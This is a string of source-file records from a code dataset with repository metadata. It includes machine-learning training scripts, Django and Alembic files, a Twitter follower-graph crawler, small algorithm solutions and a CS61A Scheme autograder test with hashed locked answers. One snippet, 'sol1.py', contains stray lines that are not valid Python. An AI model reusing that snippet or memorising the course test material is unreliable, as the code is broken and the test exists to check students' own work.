for col_name in list(df_X.columns):
col_unique_values = df_X[col_name].unique()
if 2 < len(col_unique_values) <= hyper_params_onehot_max_uniq_values:
unique_values[col_name] = col_unique_values
sorted_values = sorted(unique_values.items(), key=lambda x: len(x[1]))
print('categorical columns:')
for col_name, values in sorted_values:
print(col_name + '[', len(values), ']')
categorical_values = {}
for col_name, unique_values in sorted_values:
if len(df_X.columns) + len(unique_values) <= hyper_params_max_columns:
categorical_values[col_name] = unique_values
for unique_value in unique_values:
df_X['onehot_{}={}'.format(col_name, unique_value)] = (df_X[col_name] == unique_value).astype(int)
# break if near max allowed columns
if len(df_X.columns) >= hyper_params_max_columns - 2:
break
model_config['categorical_values'] = categorical_values
# drop constant features
constant_columns = [
col_name
for col_name in df_X.columns
if df_X[col_name].nunique() == 1
]
df_X.drop(constant_columns, axis=1, inplace=True)
# use only numeric columns
used_columns = [
col_name
for col_name in df_X.columns
if col_name.startswith('number') or col_name.startswith('onehot')
]
df_X = df_X[used_columns]
# remove high-correlate columns
corr_cols = {}
corr = df_X.corr()
print('detecting correlation >', hyper_params_corr_limit, ':')
for i in range(corr.shape[0]):
for j in range(i, corr.shape[1]):
v = corr.iloc[i, j]
if abs(v) > hyper_params_corr_limit and i != j:
corr_cols[corr.columns[j]] = True
print(corr.index[i], corr.columns[j], v)
print(corr_cols.keys())
df_X.drop( list(corr_cols.keys()), axis=1, inplace=True )
model_config['used_columns'] = df_X.columns
# scaling - in auto_ml
#scaler = StandardScaler()
#df_X = scaler.fit_transform(df_X)
#model_config['scaler'] = scaler
# fitting
column_descriptions = {
'target': 'output'
}
model_config['mode'] = args.mode
if args.mode == 'regression':
type_of_estimator = 'regressor'
model_names = ['LGBMRegressor']
#['LGBMRegressor']
#'GradientBoostingRegressor']
# XGBRegressor' ]
# LGBMRegressor']
# 'CatBoostRegressor']
# 'XGBRegressor'] #,
# 'DeepLearningRegressor']
#model = Ridge()
else:
type_of_estimator = 'classifier'
model_names = ['XGBClassifier'] #,'DeepLearningClassifier']
#model = LogisticRegression()
model_config['model_names'] = model_names
df_X['target'] = df_y
ml_predictor = Predictor( type_of_estimator='regressor', column_descriptions=column_descriptions )
ml_predictor.train(df_X, model_names=model_names )
file_name = ml_predictor.save()
model_config['model_file'] = file_name
#model.fit(df_X, df_y)
#model_config['model'] = model
model_config_filename = os.path.join(args.model_dir, 'model_config.pkl')
with open(model_config_filename, 'wb') as fout:
pickle.dump(model_config, fout, protocol=pickle.HIGHEST_PROTOCOL)
print('Train time: {}'.format(time.time() - start_time))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--train-csv', type=argparse.FileType('r'), required=True)
parser.add_argument('--model-dir', required=True)
parser.add_argument('--mode', choices=['classification', 'regression'], required=True)
args = parser.parse_args()
train( args )
|
[
"pomka@yandex.ru"
] |
pomka@yandex.ru
|
1b2e64f780ec7f16cbe47cb8915ab689f5e89234
|
bd4a3247155f51c30cf3c07346efbd30b234f424
|
/helpdesk/accounts/admin.py
|
ec0201faf57b29d458dfa7ee071204695332f51d
|
[] |
no_license
|
ps9999/helpdesk_django
|
581239151f366e6f2e76f5ce11651df2597f8c5f
|
517d44ad1c166bfebe1269585e5a1c7dcc69afe7
|
refs/heads/master
| 2023-05-04T10:54:40.195348
| 2021-05-30T17:49:09
| 2021-05-30T17:49:09
| 372,278,819
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
from django.contrib import admin
from .models import UserDetails
# Register your models here.
admin.site.register(UserDetails)
# Register your models here.
|
[
"developer18.punctualiti@gmail.com"
] |
developer18.punctualiti@gmail.com
|
d126a50f4d9c899393dc40a8dda55d2413361056
|
2d6323b8ccaf08a8929dba79fb9575c436977bd4
|
/docassemble_webapp/docassemble/webapp/alembic/versions/77e8971ffcbf_first_alembic_revision.py
|
af735caf90d6410f5f90040d7f83aab3a8717b21
|
[
"MIT"
] |
permissive
|
jhpyle/docassemble
|
f1c36e73d02807a7052b860dfceecdfa88e728c7
|
8726242cfbe3a15cad610dc2b518346be68ab142
|
refs/heads/master
| 2023-09-01T20:03:39.497473
| 2023-08-26T12:44:45
| 2023-08-26T12:44:45
| 34,148,903
| 691
| 300
|
MIT
| 2023-09-09T20:08:14
| 2015-04-18T02:09:32
|
Python
|
UTF-8
|
Python
| false
| false
| 511
|
py
|
"""first alembic revision
Revision ID: 77e8971ffcbf
Revises:
Create Date: 2017-08-13 09:07:33.368044
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix
# revision identifiers, used by Alembic.
revision = '77e8971ffcbf'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.add_column(dbtableprefix + 'user', sa.Column('modified_at', sa.DateTime))
def downgrade():
op.drop_column(dbtableprefix + 'user', 'modified_at')
|
[
"jhpyle@gmail.com"
] |
jhpyle@gmail.com
|
e7dcd01c1652e5c39955a5034b1397b2b507b1d2
|
7ebb9a09f0b033022ea12a1084aba64db6a83c61
|
/downloadUsersGraph.py
|
4388277760fc38204399e882deb6d91ba35ef86e
|
[
"Apache-2.0"
] |
permissive
|
bhaskarvk/ShellShockAnalysis
|
447c897509916c908c1ffbc08d2519414cf4d7b8
|
d60edf18da0cda0d2643b61e2a82ca4a57eed468
|
refs/heads/master
| 2021-01-02T22:31:21.547631
| 2015-05-13T14:32:04
| 2015-05-13T14:32:04
| 24,659,240
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,894
|
py
|
import tweepy
import sys
import jsonpickle
#import pandas as pd
import networkx as nx
import os
userDetailsCache = {}
def getUserDetails(api, cache, userIds):
uniqUserIds = set(userIds)
# return object
userDetails = list()
cachedUserIds = set([userId for userId in uniqUserIds if userId in cache])
userDetails.extend([cache[user] for user in cachedUserIds])
unCachedUserIds = list(uniqUserIds.difference(cachedUserIds))
usersToBeQueried = len(unCachedUserIds)
print("{0} users cached".format(len(cachedUserIds)))
print("Going to query {0} uncached users".format(usersToBeQueried))
usersQueried = 0
while (usersQueried < usersToBeQueried):
batch = unCachedUserIds[usersQueried:min(usersQueried+100, usersToBeQueried)]
usersQueried += 100
users = api.lookup_users(user_ids=batch) #TODO catch exception
userDetails.extend(users)
for user in users:
cache[user.id] = user
print("Got Back {0} users".format(len(userDetails)))
return userDetails
def getFollowersIds(api, user):
print("Going to query followers of user {0}[{1}]".format(user.screen_name, user.id))
followersIds = tweepy.Cursor(api.followers_ids, id=user.id).items(10) # 100 most recent followers
try:
return [followerId for followerId in followersIds] # We need to traverse the cursor
except tweepy.TweepError as e:
return []
def getFollowersIds2(api, userId):
print("Going to query followers of user [{0}]".format(userId))
followersIds = tweepy.Cursor(api.followers_ids, id=userId,count=5000).items(5000)
try:
return [followerId for followerId in followersIds] # We need to traverse the cursor
except tweepy.TweepError as e:
return []
def stripString(s):
if s is None:
return ''
else:
return s.strip()
def addUser(G, user):
if (not G.has_node(user.id)):
G.add_node(user.id,
created_at=user.created_at.isoformat(),
created_at_epochOffset=user.created_at.strftime('%s'),
lang=stripString(user.lang),
name=stripString(user.name),
timezone=stripString(user.time_zone),
location=stripString(user.location),
followers_count=user.followers_count,
screen_name=stripString(user.screen_name),
total_tweets=user.statuses_count
)
def addUserIds(G, userIds):
G.add_nodes_from(userIds)
def addFollowers(G, user, followers):
followersCount = 0
for follower in followers:
followersCount += 1
addUser(G, follower)
G.add_edge(follower.id, user.id)
print("Added {0} followers to User {1}[{2}]".format(followersCount, user.screen_name, user.id))
def addFollowersIds(G, userId, followersIds):
for followerId in followersIds:
G.add_edge(followerId, userId)
print("Added {0} followers to User [{1}]".format(len(followersIds), userId))
def populateGraph(G, cache, userDetails, curLevel, maxLevel):
if(curLevel<maxLevel):
print("At level {0}".format(curLevel))
for user in userDetails:
if (curLevel == 0): # Already added by prev. call to populateGraph->addFollowers
addUser(G, user)
followersIds = getFollowersIds(api, user)
if(len(followersIds)>0):
followers = getUserDetails(api, cache, followersIds)
addFollowers(G, user, followers)
populateGraph(G, cache, followers, curLevel+1, maxLevel)
else:
print("Reached max level of {0}".format(maxLevel))
def populateIdGraph(G, userIds, curLevel, maxLevel):
if(curLevel<maxLevel):
print("At level {0}".format(curLevel))
if(curLevel==0):
addUserIds(G, userIds)
for userId in userIds:
followersIds = getFollowersIds2(api, userId)
if(len(followersIds)>0):
addFollowersIds(G, userId, followersIds)
populateIdGraph(G, followersIds, curLevel+1, maxLevel)
else:
print("Reached max level of {0}".format(maxLevel))
# Don't buffer stdout, so we can tail the log output redirected to a file
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
# API and ACCESS KEYS
API_KEY = sys.argv[1]
API_SECRET = sys.argv[2]
userIdfName = sys.argv[3]
outfName = sys.argv[4]
auth = tweepy.AppAuthHandler(API_KEY, API_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
if (not api):
print ("Can't Authenticate Bye!")
sys.exit(-1)
with open(userIdfName, 'r') as inp:
authors = [line.rstrip('\n') for line in inp]
#authorDetails = getUserDetails(api, userDetailsCache, authors)
G = nx.DiGraph()
populateIdGraph(G, authors, 0, 3)
nx.write_gexf(G, outfName)
|
[
"bhaskar.karambelkar1@one.verizon.com"
] |
bhaskar.karambelkar1@one.verizon.com
|
04f64864c4808ff07643657ba76b4819ca99b6cf
|
ddef64902d50174004c86d45adbf88fb0924f0a0
|
/train.py
|
d81a370f5103907b06397a854544e735bfac0296
|
[
"MIT"
] |
permissive
|
Babibubebon/DCGAN-chainer
|
731a531db8afc51b4b026e8eb1476493bc116dd2
|
1beb499c559362907a0fd79cb641ad5ba10a0780
|
refs/heads/master
| 2021-05-01T09:13:00.708857
| 2017-01-16T17:22:58
| 2017-01-16T17:22:58
| 75,496,801
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,300
|
py
|
#!/usr/bin/env python
import argparse
import os
import sys
import numpy as np
from PIL import Image
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import Variable
from chainer import serializers
from chainer import training
from chainer.training import extensions
from net import Generator, Discriminator
from generate import ext_output_samples
# network
nz = 100 # of dim for Z
ngf = 512 # of gen filters in first conv layer
ndf = 64 # of discrim filters in first conv layer
nc = 3 # image channels
size = 64 # size of output image
# optimizer
learning_rate = 0.001
beta1 = 0.5
lr_decay = {
"rate": 0.85,
"target": 0.0001,
"trigger": (1000, 'iteration')
}
weight_decay = 1e-5
gradient_clipping = 100
class Dataset(chainer.datasets.ImageDataset):
def get_example(self, i):
path = os.path.join(self._root, self._paths[i])
f = Image.open(path).convert('RGB')
return self.preprocess(f)
def preprocess(self, image):
cimg = np.asarray(image, dtype=np.float32).transpose(2, 0, 1)
rnd = np.random.randint(2)
if rnd == 1:
# flip
cimg = cimg[:,:,::-1]
return (cimg - 128) / 128
class DCGANUpdater(chainer.training.StandardUpdater):
def update_core(self):
x_batch = self.converter(self._iterators['main'].next(), self.device)
z_batch = self.converter(np.random.uniform(-1, 1, (len(x_batch), nz)).astype(np.float32), self.device)
G_optimizer = self._optimizers['generator']
D_optimizer = self._optimizers['discriminator']
G_loss_func = G_optimizer.target.get_loss_func(D_optimizer.target)
D_loss_func = D_optimizer.target.get_loss_func(G_optimizer.target)
G_optimizer.update(G_loss_func, Variable(z_batch))
D_optimizer.update(D_loss_func, Variable(x_batch), Variable(z_batch))
def main():
parser = argparse.ArgumentParser(description='DCGAN with chainer')
parser.add_argument('--batchsize', '-b', type=int, default=128,
help='Number of images in each mini-batch')
parser.add_argument('--epoch', '-e', type=int, default=1000,
help='Number of sweeps over the dataset to train')
parser.add_argument('--gpu', '-g', type=int, default=-1,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--out', '-o', default='result',
help='Directory to output the result')
parser.add_argument('--initmodel', '-m', default='', nargs=2,
help='Initialize the model from given file')
parser.add_argument('--resume', '-r', default='',
help='Resume the optimization from snapshot')
parser.add_argument('image_dir', default='images', help='Directory of training data')
parser.add_argument('--test', action='store_true', default=False)
args = parser.parse_args()
print('GPU: {}'.format(args.gpu))
print('# Minibatch-size: {}'.format(args.batchsize))
print('# epoch: {}'.format(args.epoch))
# check paths
if not os.path.exists(args.image_dir):
sys.exit('image_dir does not exist.')
# Set up a neural network to train
G = Generator(ngf, nz, nc, size)
D = Discriminator(ndf)
if args.gpu >= 0:
chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current
G.to_gpu()
D.to_gpu()
xp = np if args.gpu < 0 else chainer.cuda.cupy
# Setup an optimizer
G_optimizer = chainer.optimizers.Adam(alpha=learning_rate, beta1=beta1)
D_optimizer = chainer.optimizers.Adam(alpha=learning_rate, beta1=beta1)
G_optimizer.use_cleargrads()
D_optimizer.use_cleargrads()
G_optimizer.setup(G)
D_optimizer.setup(D)
if weight_decay:
G_optimizer.add_hook(chainer.optimizer.WeightDecay(weight_decay))
D_optimizer.add_hook(chainer.optimizer.WeightDecay(weight_decay))
if gradient_clipping:
G_optimizer.add_hook(chainer.optimizer.GradientClipping(gradient_clipping))
D_optimizer.add_hook(chainer.optimizer.GradientClipping(gradient_clipping))
# Init models
if args.initmodel:
print('Load model from', args.initmodel)
serializers.load_npz(args.initmodel[0], G)
serializers.load_npz(args.initmodel[1], D)
# Load dataset
files = os.listdir(args.image_dir)
dataset = Dataset(files, args.image_dir)
dataset_iter = chainer.iterators.MultiprocessIterator(dataset, args.batchsize)
print('# samples: {}'.format(len(dataset)))
# Set up a trainer
optimizers = {'generator': G_optimizer, 'discriminator': D_optimizer}
updater = DCGANUpdater(dataset_iter, optimizers, device=args.gpu)
trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)
if lr_decay:
trainer.extend(extensions.ExponentialShift(
'alpha', rate=lr_decay["rate"], target=lr_decay["target"], optimizer=G_optimizer),
trigger=lr_decay["trigger"])
trainer.extend(extensions.ExponentialShift(
'alpha', rate=lr_decay["rate"], target=lr_decay["target"], optimizer=D_optimizer),
trigger=lr_decay["trigger"])
log_interval = (100, 'iteration') if args.test else (1, 'epoch')
snapshot_interval = (1000, 'iteration') if args.test else (1, 'epoch')
suffix = '_{0}_{{.updater.{0}}}'.format(log_interval[1])
trainer.extend(extensions.snapshot(
filename='snapshot' + suffix), trigger=snapshot_interval)
trainer.extend(extensions.snapshot_object(
G, 'gen' + suffix), trigger=log_interval)
trainer.extend(extensions.snapshot_object(
D, 'dis' + suffix), trigger=log_interval)
trainer.extend(ext_output_samples(
10, 'samples' + suffix, seed=0), trigger=log_interval)
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.PrintReport(
['epoch', 'iteration', 'generator/loss', 'discriminator/loss', 'elapsed_time']), trigger=log_interval)
trainer.extend(extensions.ProgressBar(update_interval=20))
if args.resume:
# Resume from a snapshot
chainer.serializers.load_npz(args.resume, trainer)
# Run the training
trainer.run()
if __name__ == '__main__':
main()
|
[
"babibubebon@babibubebo.org"
] |
babibubebon@babibubebo.org
|
b76d58cb204ba500878f7cd3c2ede8c946049e1e
|
6d43c34b418233d9b81980e6cba01a26d6a3e91a
|
/baekjoon/Bronze/b_14613.py
|
bc85792a2757157456ca9059dc0112cad935f09b
|
[] |
no_license
|
spongebob03/Playground
|
1cbba795294e5d609cb0ae951568f62d6f7e8dbc
|
4acae2f742f9f8b7e950053207e7c9f86cea6233
|
refs/heads/master
| 2021-01-05T04:22:36.303355
| 2020-05-22T13:59:28
| 2020-05-22T13:59:28
| 240,878,997
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
#20ํ ํ์๋ ๊ฒฐ๊ณผ ์ ์
import sys
def score(w,l,d):
r=20*w*50+20*l*(-50)+20*d*0
return r
x=sys.stdin.readline().split()
w=float(x[0])
l=float(x[1])
d=float(x[2])
print(score(w,l,d))
|
[
"sunhee1996@naver.com"
] |
sunhee1996@naver.com
|
bc60efd01c040cb518b3422687792c91c73cfecf
|
72b349152a3af42a6f071071882e9c08720a1b75
|
/121.py
|
c18e98d981f348db8c0ae4996a87e3d85b8a9870
|
[] |
no_license
|
Deepakdk7/PlayerSet13
|
3ffed2fb4bcd5c043de647f93700c4003687da29
|
fc7d559636ed83a231b1bf1681d21485ee134030
|
refs/heads/master
| 2020-06-05T15:28:38.442065
| 2019-07-08T14:35:58
| 2019-07-08T14:35:58
| 192,473,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
ax=int(input())
c=[]
for i in range(0,ax):
c.append(input())
c=sorted(c)
print(c[0])
|
[
"noreply@github.com"
] |
Deepakdk7.noreply@github.com
|
39aba911814d6e695bacb578bca4d346e8d77f35
|
3ae4c65b8463c0ae2d6f4edfae85a62b9922230f
|
/SimDis/exps/arxiv/base_exp_simDis.py
|
704a19939b7f41f2efef9143197a78c658f0ad52
|
[
"MIT"
] |
permissive
|
dungdinhanh/SimDis
|
2eb2e946ad38d10d7e8e0a03b4dc53e59436438c
|
0871a217a756acc268f35f802e35b01b12817f0d
|
refs/heads/main
| 2023-06-15T15:03:48.114277
| 2021-07-15T16:01:49
| 2021-07-15T16:01:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,731
|
py
|
# encoding: utf-8
import os
import itertools
import torch
import torch.nn as nn
import torch.distributed as dist
from SimDis.models.sim_dis_train_model import SimDis_Model
from SimDis.exps.arxiv import base_exp
from SimDis.layers.optimizer import LARS_SGD
class Exp(base_exp.BaseExp):
def __init__(self, args):
super(Exp, self).__init__()
self.args = args
# ------------------------------------- model config ------------------------------ #
self.param_momentum = args.ema_moment
# ------------------------------------ data loader config ------------------------- #
self.data_num_workers = 10
# ------------------------------------ training config --------------------------- #
self.warmup_epochs = 10
self.max_epoch = args.epochs
self.warmup_lr = 1e-6
self.basic_lr_per_img = args.basic_lr / 256.0
self.lr = self.basic_lr_per_img * args.word_size * args.nr_gpu * args.batchsize
self.weight_decay = 1e-4
self.momentum = 0.9
self.print_interval = 200
self.n_views = args.n_views
self.exp_name = '{}_stu_{}_tea_{}_ema_{}_lr_{}_syncBN_{}_opt_{}_epoch_{}_BS_{}_GPUs_{}'.format(
args.method, args.model_s, args.model_t, args.ema_moment, self.lr,
args.syncBN, args.optimizer, args.epochs, args.batchsize, args.word_size * args.nr_gpu
)
def get_model(self):
if "model" not in self.__dict__:
self.model = SimDis_Model(self.args, self.param_momentum, len(self.data_loader["train"]) * self.max_epoch)
return self.model
def get_data_loader(self, batch_size, is_distributed, if_transformer=False):
if "data_loader" not in self.__dict__:
if if_transformer:
pass
else:
from SimDis.data.transforms import byol_transform
from SimDis.data.dataset import SSL_Dataset
transform = byol_transform()
train_set = SSL_Dataset(transform)
sampler = None
if is_distributed:
sampler = torch.utils.data.distributed.DistributedSampler(train_set)
dataloader_kwargs = {"num_workers": self.data_num_workers, "pin_memory": False}
dataloader_kwargs["sampler"] = sampler
dataloader_kwargs["batch_size"] = batch_size
dataloader_kwargs["shuffle"] = False
dataloader_kwargs["drop_last"] = True
train_loader = torch.utils.data.DataLoader(train_set, **dataloader_kwargs)
self.data_loader = {"train": train_loader, "eval": None}
return self.data_loader
def get_optimizer(self, model, batch_size):
# Noticing hear we only optimize student_encoder
if "optimizer" not in self.__dict__:
if self.warmup_epochs > 0:
lr = self.warmup_lr
else:
lr = self.lr
paras = []
if self.args.model_s is not None: paras += list(model.student.parameters())
if (self.args.model_t is not None) and (not self.args.offline) : paras += list(model.teacher.parameters())
if self.args.optimizer == 'SGD':
self.optimizer = torch.optim.SGD(paras, lr=lr, weight_decay=self.weight_decay, momentum=self.momentum)
if self.args.rank == 0: print(self.args.optimizer, 'Optimizer is used!')
elif self.args.optimizer == 'LARS':
params_lars = []
params_exclude = []
for m in self.model.modules():
if isinstance(m, nn.BatchNorm1d) or isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.SyncBatchNorm):
params_exclude.append(m.weight)
params_exclude.append(m.bias)
elif isinstance(m, nn.Linear):
params_lars.append(m.weight)
params_exclude.append(m.bias)
elif isinstance(m, nn.Conv2d):
params_lars.extend(list(m.parameters()))
assert len(params_lars) + len(params_exclude) == len(list(self.model.parameters()))
self.optimizer = LARS_SGD(
[{"params": params_lars, "lars_exclude": False}, {"params": params_exclude, "lars_exclude": True}],
lr=lr,
weight_decay=self.weight_decay,
momentum=self.momentum,
)
if self.args.rank == 0: print(self.args.optimizer, 'Optimizer is used!')
return self.optimizer
|
[
"jindong@MAQ22589.redmond.corp.microsoft.com"
] |
jindong@MAQ22589.redmond.corp.microsoft.com
|
8d0509ef4d9588c50f4b53e2600484a81696135d
|
f67beb57a4b54c5e5c5dd8ac030f6adebc1fd9cf
|
/Offer/6.py
|
10f402f56449c35e89abf9a0b5862eb3e0cdfbbb
|
[] |
no_license
|
jasonliujiang/DataStructurePython
|
e00e526ce4f65542c5cdd88da05e707e29f1b815
|
ec4768b6b49e1dfa96f5fef66e4d4ee3d09b2ccf
|
refs/heads/master
| 2022-01-30T19:07:02.135289
| 2019-07-07T01:59:54
| 2019-07-07T01:59:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,847
|
py
|
"""
ๆ่ฝฌๆฐ็ป็ๆๅฐๆฐๅญ
Q: ๆไธไธชๆฐ็ปๆๅผๅง็่ฅๅนฒไธชๅ
็ด ๆฌๅฐๆฐ็ป็ๆซๅฐพ๏ผๆไปฌ็งฐไนไธบๆฐ็ป็ๆ่ฝฌใ ่พๅ
ฅไธไธช้ๅๆๅบ็ๆฐ็ป็ไธไธชๆ่ฝฌ๏ผ่พๅบๆ่ฝฌๆฐ็ป็ๆๅฐๅ
็ด ใ ไพๅฆๆฐ็ป{3,4,5,1,2}ไธบ{1,2,3,4,5}็ไธไธชๆ่ฝฌ๏ผ่ฏฅๆฐ็ป็ๆๅฐๅผไธบ1ใ NOTE๏ผ็ปๅบ็ๆๆๅ
็ด ้ฝๅคงไบ0๏ผ่ฅๆฐ็ปๅคงๅฐไธบ0๏ผ่ฏท่ฟๅ0ใ
A: ไบๅๆฅๆพ็ๅๅฝข๏ผๆ่ฝฌๆฐ็ป็้ฆๅ
็ด ่ฏๅฎไธๅฐไบๆ่ฝฌๆฐ็ป็ๅฐพๅ
็ด ๏ผๆพไธไธชไธญ้ด็น๏ผๅฆๆไธญ้ด็นๆฏ้ฆๅ
็ด ๅคง๏ผ่ฏดๆๆๅฐๆฐๅญๅจไธญ้ด็นๅ้ข๏ผๅฆๆไธญ้ด็นๆฏๅฐพๅ
็ด ๅฐ๏ผ่ฏดๆๆๅฐๆฐๅญๅจไธญ้ด็นๅ้ขใ็ถๅๅพช็ฏใ ไฝๆฏๅจไธๆฌกๅพช็ฏไธญ๏ผ้ฆๅ
็ด ๅฐไบๅฐพๅ
็ด ๏ผ่ฏดๆ่ฏฅๆฐ็ปๆฏๆๅบ็๏ผ้ฆๅ
็ด ๅฐฑๆฏๆๅฐๆฐๅญ๏ผๅฆๆๅบ็ฐ้ฆๅ
็ด ใๅฐพๅ
็ด ใไธญ้ดๅผไธ่
็ธ็ญ๏ผๅๅช่ฝๅจๆญคๅบๅไธญ้กบๅบๆฅๆพใ
"""
# -*- coding:utf-8 -*-
class Solution:
def minNumberInRotateArray(self, rotateArray):
# write code here
if len(rotateArray) == 0:
return 0
front = 0
rear = len(rotateArray) - 1
minVal = rotateArray[0]
if rotateArray[front] < rotateArray[rear]:
return rotateArray[front]
else:
while (rear - front) > 1:
mid = (front + rear) // 2
if rotateArray[mid] >= rotateArray[front]:
front = mid
elif rotateArray[mid] <= rotateArray[rear]:
rear = mid
elif rotateArray[front] == rotateArray[rear] == rotateArray[mid]:
for i in range(1, len(rotateArray)):
if rotateArray[i] < minVal:
minVal = rotateArray[i]
rear = i
minVal = rotateArray[rear]
return minVal
|
[
"jason_liujiang@163.com"
] |
jason_liujiang@163.com
|
895d715fb433475c1e0bbac0e0de220755191440
|
c0df13f6936d433dd317b825fb15f1a19a0d8c91
|
/python/challenges/multi_bracket_validation/multi_bracket_validation.py
|
bfba9a0fe2afc414e817ff0b0937b8270c696dc4
|
[
"MIT"
] |
permissive
|
kmangub/data-structures-and-algorithms
|
17400365e28f562f4f213cefc4f278faec69c100
|
44b42c0d892f39593997bccb793eacc4d7d98906
|
refs/heads/master
| 2023-04-07T00:55:39.015895
| 2021-04-07T15:24:16
| 2021-04-07T15:24:16
| 298,032,265
| 0
| 0
|
MIT
| 2021-04-07T15:24:17
| 2020-09-23T16:38:52
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,571
|
py
|
def multi_bracket_validation(string):
"""
This function will check to see if the brackets are matching. It creates
an empty list, which is our stack and we will iterate through each
character.
Any opening brackets will be appended to our stack.
When it encounters a closing bracket, it will check if the stack is empty and
will return false if it is.
If the stack is not empty, it will pop the last element and it will
compare to the closing bracket.
It will return false it doesn't match right away. Once we are done
iterating, it checks the length again and return the appropriate Boolean
"""
stack = []
for char in string:
print(char)
if char == '{' or char == '(' or char == '[':
stack.append(char)
elif char == '}' or char == ')' or char == ']':
if len(stack) == 0:
return False
top_of_stack = stack.pop()
if not compare(top_of_stack, char):
return False
if len(stack) != 0:
print('stack not empty...')
return False
print(stack)
return True
def compare(opening, closing):
"""
This function supplements our multi bracket validation.
If the statement returns False, the function returns False.
"""
if opening == '{' and closing == '}':
return True
if opening == '(' and closing == ')':
return True
if opening == '[' and closing == ']':
return True
return False
print(multi_bracket_validation('{(})'))
|
[
"karlomangubat92@gmail.com"
] |
karlomangubat92@gmail.com
|
ae2e93a6208b4010177eb59cd1e9848965a91f17
|
09f370c50cfe220f623f57b30489a9ddb31f4441
|
/d2/sol1.py
|
7154678fb0a318c18324941507a3a0306fef9e18
|
[] |
no_license
|
chanin-shim/SWEA
|
bb755787d6d7b62bf4a62b5fb5bd3b8b166cffac
|
2dcfdd4feeb0027e50a5a82e58326b399466f816
|
refs/heads/master
| 2023-04-14T12:14:19.662433
| 2021-04-22T13:55:35
| 2021-04-22T13:55:35
| 339,105,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
import sys
sys.stdin = open("input.txt")
T = int(input())
19(T) -> 11(L)
6(G) -> 34(i)
-> 31(f)
38(m) -> 30(e)
for tc in range(1, T+1):
print("#{} ".format(tc, ))
|
[
"chanin.shim@gmail.com"
] |
chanin.shim@gmail.com
|
3949fcb5e38cae1dfee79add93d17672db7ce79f
|
6909de83dd90ee1169d6c453c327ab2ce2687485
|
/scheme/tests/08.py
|
4081350d6bc2a5a3e87e9b394b45fcdb83bd2d98
|
[] |
no_license
|
dantefung/cs61a-2021-summer
|
730cb0b9ab7327c32c619779d71882531bf328dd
|
4f22f20fcfddfb5bf121081919310413209da1b2
|
refs/heads/master
| 2023-08-19T14:51:27.380738
| 2021-11-01T06:54:33
| 2021-11-01T06:54:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,570
|
py
|
test = {
"name": "Problem 8",
"points": 1,
"suites": [
{
"cases": [
{
"code": r"""
scm> (lambda (x y) (+ x y))
1456de84c3edf333b6f7aee0c0624b20
# locked
scm> (lambda (x)) ; type SchemeError if you think this causes an error
ec908af60f03727428c7ee3f22ec3cd8
# locked
""",
"hidden": False,
"locked": True,
},
{
"code": r"""
scm> (lambda (x) (+ x) (+ x x))
(lambda (x) (+ x) (+ x x))
""",
"hidden": False,
"locked": False,
},
{
"code": r"""
scm> (lambda () 2)
(lambda () 2)
""",
"hidden": False,
"locked": False,
},
],
"scored": True,
"setup": "",
"teardown": "",
"type": "scheme",
},
{
"cases": [
{
"code": r"""
>>> env = create_global_frame()
>>> lambda_line = read_line("(lambda (a b c) (+ a b c))")
>>> lambda_proc = do_lambda_form(lambda_line.rest, env)
>>> lambda_proc.formals # use single quotes ' around strings in your answer
d106bb7be6b014a9d16d74410be4a8a5
# locked
>>> lambda_proc.body # the body is a *list* of expressions! Make sure your answer is a properly nested Pair.
0ef147cfe5caf670e985d95d923f4b06
# locked
""",
"hidden": False,
"locked": True,
},
{
"code": r"""
>>> env = create_global_frame()
>>> lambda_line = read_line("(lambda (x y) x)")
>>> lambda_proc = do_lambda_form(lambda_line.rest, env)
>>> isinstance(lambda_proc, LambdaProcedure)
True
>>> lambda_proc.env is env
True
>>> lambda_proc
LambdaProcedure(Pair('x', Pair('y', nil)), Pair('x', nil), <Global Frame>)
""",
"hidden": False,
"locked": False,
},
],
"scored": True,
"setup": r"""
>>> from scheme_reader import *
>>> from scheme import *
""",
"teardown": "",
"type": "doctest",
},
],
}
|
[
"wuyudi1109@gmail.com"
] |
wuyudi1109@gmail.com
|
b3e7ce620c23754a089a63d0309b815e97c65655
|
8756821493ab79aeb3f4fd6255470c415e1fbcf5
|
/server/api/user/urls.py
|
686a5a45b4e23f66d9a325b0045bd171abf152e5
|
[] |
no_license
|
aleloup-ops/Dashboard-EPITECH
|
462cbcec141fd3b9218ebde8a4c269cc6cab58a4
|
8871c55e89884ffddaaf851928d3220d3e8f9eab
|
refs/heads/main
| 2023-02-20T10:22:40.811112
| 2021-01-19T20:42:21
| 2021-01-19T20:42:21
| 317,262,364
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('<str:user_id>', views.get_user, name='get_index')
]
|
[
"alexandre.megel@epitech.eu"
] |
alexandre.megel@epitech.eu
|
2ed362409143988f8e51e25c2879fbeca2e5301f
|
9724e9d7a03a1fbf39eeb4010b1083d25922e087
|
/introduction-to-hadoop-and-mapreduce/project_discussion_forum_data/post_and_answer_length/mapper.py
|
c98444a3a24c0a7fcf7b740ccec1c205ab0df1f8
|
[] |
no_license
|
rzskhr/Hadoop-and-MapReduce
|
